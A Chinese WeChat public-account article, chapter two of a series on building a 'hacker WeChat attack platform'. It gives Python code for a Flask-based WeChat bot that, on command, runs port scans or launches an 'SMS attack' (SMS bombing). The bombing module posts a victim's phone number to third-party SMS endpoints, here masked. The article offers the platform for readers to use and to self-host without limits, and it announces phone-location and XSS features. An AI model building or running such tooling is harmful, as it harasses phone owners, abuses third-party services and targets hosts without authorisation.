版权声明:
本文首发于微信号:inn0team
此文章版权归属于inn0team所有,转载请自觉保留以上版权声明
告知:
本公众号不提供非法用途,所以有些攻击手段,公众号内将会有诸多限制。如果想打造真正没有限制的攻击平台,请自申请公众号,源代码将会在下几章发布到github。
公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。
公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。
公众号短信攻击只在发布文章的30分钟内,开放超过该时间取消此功能。
目标:
-
短信攻击
-
网站扫描
-
端口扫描
-
IP定位
-
MD5破解
-
xss平台
-
…… (有什么需要添加的,请留言)
-
(透露下,如果没有意外可能会加入
手机号定位功能)
关于代码:
本套代码,将会在github 开源(采用 MIT 许可协议,可放心集成于商业产品中)。
开始打造
目录:
* 代表此次修改文件
|-- run.py #启动文件
|-- wechat #微信配置目录
|---- __init__.py
|---- wechatConfig.py #微信配置验证,模块加载接口 *
|---- mode #模块目录
|------ __init__.py
|------ scanPort.py #端口扫描模块
|------ sendSMS.py #短信攻击模块 *
wechatConfig.py
#! /usr/bin/python
# -*- coding: utf-8 -*-
from flask import make_response
import hashlib
from mode import scanPort,sendSMS
def wechat_auth(token,data):
signature = data.get('signature','')
timestamp = data.get('timestamp','')
nonce = data.get('nonce','')
echostr = data.get('echostr','')
s = [timestamp,nonce,token]
s.sort()
s = ''.join(s)
if (hashlib.sha1(s).hexdigest() == signature):
return make_response(echostr)
def wechat_mode(content):
if content==u"攻击":
return "G1:端口扫描nG2:短信攻击nn攻击格式:编号&目标n列如:G1&127.0.0.1n列如:G2&188****1111"
elif "G1&" in content:
arr=content.split('&')
return "你扫描的IP端口为:"+str(scanPort.init(arr[1]))
elif "G2&"in content:
arr=content.split('&')
return "系统提示:"+str(sendSMS.sendSMS(arr[1]))
else:
return "感谢你的留言!"
sendSMS.py:
#! /usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import urllib
#短信攻击接口1
def sendServer1(phone):
data = {}
data['mobile'] = phone
#定义post的地址
url = 'http://www.xxxxx.com/xxxx/xxxxxx'
post_data = urllib.urlencode(data)
#提交,发送数据
try:
req = urllib2.urlopen(url, post_data)
except:
print '异常'
#短信攻击接口2
def sendServer2(phone):
data = {}
data['mobile'] = phone
#定义post的地址
url = 'http://www.xxxxx.com/xxxx/xxxxxx'
post_data = urllib.urlencode(data)
#提交,发送数据
try:
req = urllib2.urlopen(url, post_data)
except:
print '异常'
def sendSMS(phone):
sendServer1(phone)
sendServer2(phone)
return '发送成功!'
启动项目:
python run.py
测试截图
本文始发于微信公众号(inn0team):黑客微信攻击平台-第二章(短信攻击)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论